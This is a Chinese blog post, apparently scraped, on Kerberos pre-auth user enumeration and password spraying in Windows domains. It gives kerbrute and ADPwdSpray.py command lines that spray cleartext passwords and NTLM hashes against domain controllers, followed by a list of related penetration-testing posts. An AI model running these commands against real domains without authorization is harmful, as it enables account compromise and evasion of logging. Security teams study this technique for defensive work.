2. 程式人生 > 其它 >域滲透之 pre-auth使用者列舉

域滲透之 pre-auth使用者列舉

阿新 發佈:2021-09-03

域滲透之 pre-auth使用者列舉

適用場景與優點

適用於在域外對域使用者進行使用者列舉和爆破

使用Kerberos pre-auth bruteforcing的速度快,並且不會產生日誌。
適用場景:

在沒有域使用者的口令,所以無法通過LDAP協議枚舉出所有域使用者,可以使用這種方式來驗證使用者是否存在

使用者存在,抓包內容,這裡借用三好師傅的圖

使用者不存在,抓包內容如下

使用者列舉

https://github.com/ropnop/kerbrute

https://github.com/3gstudent/pyKerbrute

kerbrute_windows_amd64.exe userenum --dc 192.168.22.135 -d nncm 1.txt

密碼噴射

口令正確抓包如下

口令錯誤抓包如下

kerbrute_windows_amd64.exe passwordspray --dc 192.168.37.131 -d nncm user.txt xx110110.

//針對明文進行噴灑
python2 ADPwdSpray.py 10.1.1.1 hack.com user.txt clearpassword 123.com tcp

//針對雜湊進行噴灑
python2 ADPwdSpray.py 10.1.1.1 hack.com user.txt ntlmhash afffeba176210fad4628f0524bfe1942 udp

Reference

滲透技巧-通過Kerberos-pre-auth進行使用者列舉和口令爆破

相關推薦

滲透 pre-auth使用者列舉

滲透 pre-auth使用者列舉 適用場景與優點 適用於在域外對使用者進行使用者列舉和爆破

滲透ldap協議

LDAP(Light Directory Access Protocal)是一個基於X.500標準的輕量級目錄訪問協議,LDAP是支援跨平臺的Internet協議,只需要通過LDAP做簡單的配置就可以與伺服器做認證互動。可以大大降低開發的成本。

滲透匯出Hash

滲透匯出Hash 前言 網上採集了一些內匯出NTDS.dit檔案的方式 Hash 值儲存在控制器中(C:\\Windows\\NTDS\\NTDS.DIT)

內網滲透賬戶查詢

內網滲透賬戶查詢 https://www.cnblogs.com/iAmSoScArEd/p/13874776.html---來自 我超怕的

內網滲透內橫向移動

公眾號:白帽子左一 hash 介紹 在環境中,使用者資訊儲存在控的ntds.dit(C:\\Windows\\NTDS\\NTDS.dit)中;非環境也就是在工作組環境中,當前主機使用者的密碼資訊儲存著在sam檔案(C:\\Windows\\System32\

內網橫向滲透 ATT&CK系列一 橫向滲透主機

前言 上一篇文章中已獲取了關於的一些基本資訊,在這裡再整理一下,不知道資訊收集的小夥伴可以看回上一篇文章哦

內網橫向滲透 ATT&CK系列一 拿下控制器

資訊收集 資訊收集 控制器的相關資訊: 通過arp掃描發現控制器的ip地址為:192.168.52.138,嘗試使用msf的smb_login模組登入smb是否成功

設計模式(九)觀察模式

本文首發於個人部落格 前言 什麼是觀察模式 觀察模式屬於行為型模式。 觀察模式(有時又被稱為模型(Model)-檢視(View)模式、源-收聽者(Listener)模式或從屬模式)是軟體設計模式的一種。在此種模式中,

【原創】IOT滲透抓包5法

文章作者:[email protected]& qui3t 近期我們對一些智慧家電裝置進行了滲透測試,其中一個目標裝置是某公司的智慧插座產品。拿到產品後我們一般會進行下面的兩步操作:第一步裝置配網,即插座繫結;第二步通過

內網滲透通道構建

實驗環境: Win7:192.168.152.136 Win2008:192.168.152.135 物理機:199.200.233.176 在win2008阻止物理機的訪問,即win2008只可以win7訪問 物理機可以訪問win7不能訪問win2008:

內網之一次失敗的滲透

VMnet1 52(內網) VMnet2 72 (公網) Kali: 192.168.72.129 Win7:192.168.72.128 攻擊機: Web滲透

滲透基本概念

域滲透基本概念 0x01什麼是內網? 內網就是區域網(LAN),比如內網中的機器,輸入ipconfig /all發現我們的ip是192.168..,內網中一號機器是192.168.0.1,二號機器是192.168.0.2,以此類推,但是我們在瀏覽器中輸入 i

記一次metasploitable2內網滲透21,22,23埠爆破

Hydra是一款非常強大的暴力破解工具,它是由著名的黑客組織THC開發的一款開源暴力破解工具。Hydra是一個驗證性質的工具,主要目的是:展示安全研究人員從遠端獲取一個系統認證許可權。

記一次metasploitable2內網滲透samba服務的攻擊

80埠中對應一些web靶場,在這裡不記錄 111埠的利用是向rpcbind服務的UDP套接字傳送60位元組載荷,便可填充目標記憶體,搞崩主機系統。在這裡也不記錄

滲透下的委派攻擊(非約束委派&約束委派&基於資源的約束委派)

委派攻擊 簡介 委派是指將內使用者的許可權委派給服務賬戶,使得相關服務賬戶能夠以使用者的許可權獲得相關內服務資源許可權

滲透-Kerberos身份驗證流程

滲透-Kerberos身份驗證流程 Kerberos協議框架 在 Kerberos 協議中主要是有三個角色的存在:

滲透】利用S4U2self提權

一、利用場景 當獲取內機器許可權,許可權為iis、Network Service等許可權,就可以利用S4u2Self進行許可權提升,儘管要在帳戶上專門啟用約束委派才能使用S4U2proxy 跨系統“使其工作”,但任何具有 SPN 的主體都可

請求ajax攜帶cookie前後端程式設定 java

使用場景: 通過一個專案 ,給另外一個專案加上cookie資訊 ajax 請求部分 $.ajax({

滲透burp+夜神模擬器+proxifier APP抓包

參考連結 app滲透測試 抓包 第一節 burpsuite https 夜神模擬器抓包:http://bilibili.com/video/BV1dV411t7i7/?spm_id_from=333.788.videocard.1

設計模式【建造模式】

什麼是建造模式?建造模式有兩種使用方式你知道嘛?建造模式和工廠方法模式又有什麼區別呢?讓我們一起來學習設計模式【建造模式】。